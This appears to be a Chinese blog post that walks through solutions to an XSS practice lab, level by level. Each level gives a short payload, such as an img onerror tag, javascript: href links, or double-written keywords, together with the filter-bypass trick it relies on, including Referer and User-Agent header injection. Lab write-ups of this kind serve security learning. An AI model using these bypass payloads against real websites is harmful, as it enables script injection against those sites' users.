Xss Lab
level1
<img src=1 onerror=alert('1')> |
level2
闭合
"/><img src="1" onerror="alert(1)" /> |
level3
过滤< >
' onfocus=javascript:alert('xss') class=' |
level4
" onfocus=javascript:alert('xss') class=" |
level5
过滤事件 onfocus/script 等关键字 添加_干扰
"> <a href=javascript:alert('xss')>xss</a> // |
level6
过滤 href 大写绕过
"> <a Href=javascript:alert('xss')>xss</a> // |
level7
直接删除关键字 双写绕过
"> <a hrhrefef=javascrscriptipt:alert('xss')>xss</a> // |
level8
过滤引号 <> 关键字添加_干扰 对 javascript unicode 编码
javascript:alert('1') |
level9
检查有无 url,加一个即可 unicode 编码能绕过替换关键词
javascript:alert('1')//http:// |
level10
hidden input
t_sort=" onfocus=javascript:alert('xss') // |
level11
看源码改 refer 头
"type="text" onclick=javascript:alert('xss')// |
level12
直接改 ua 头
"type="text" onclick=javascript:alert('xss')// |
level13
应该是改 cookie, 题目有点问题
"type="text" onclick=javascript:alert('xss')// |
level14
看 wp 是文件解析引发 xss
在图片的 exif 信息里加 xss
但是链接挂了 x 不了
'"><img src="1" onerror="alert(document.domain)" />' |
level15
AngularJS 的 javascript 框架漏洞
ng-include 可以将部分代码打包成独立文件,在使用 ng-include 来引用这个独立的 HTML 文件, 类似文件包含漏洞
环境有点问题
src='level4.php?keyword=%22%20onmouseover=alert(1)%20%22' |
level16
过滤空格
<img src="1" onerror="alert(1)" /> |
level17/8/9/0
都用的 flash,浏览器不支持,懒得做了
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 S.M.A.R.T!
评论